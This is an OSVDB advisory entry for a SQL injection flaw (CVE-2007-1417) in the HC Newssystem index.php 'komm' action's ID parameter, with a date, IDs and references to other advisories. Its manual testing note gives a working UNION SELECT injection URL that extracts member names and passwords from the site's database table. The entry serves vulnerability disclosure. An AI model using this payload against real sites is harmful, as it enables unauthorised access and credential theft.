HC Newssystem index.php komm Action ID Variable SQL Injection

2007-03-09T09:48:51
ID OSVDB:33976
Type osvdb
Reporter OSVDB
Modified 2007-03-09T09:48:51

Description

Manual Testing Notes

http://[target]/path/index.php?option=news&aktion=komm&ID=-1//UNION//SELECT//null,null,mname,null,mpassword,null,null//FROM/ /hcmitglieder//WHERE/*/id=1/

References:

Secunia Advisory ID:24477 Other Advisory URL: http://milw0rm.com/exploits/3449 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-03/0078.html FrSIRT Advisory: ADV-2007-0904 CVE-2007-1417 Bugtraq ID: 22898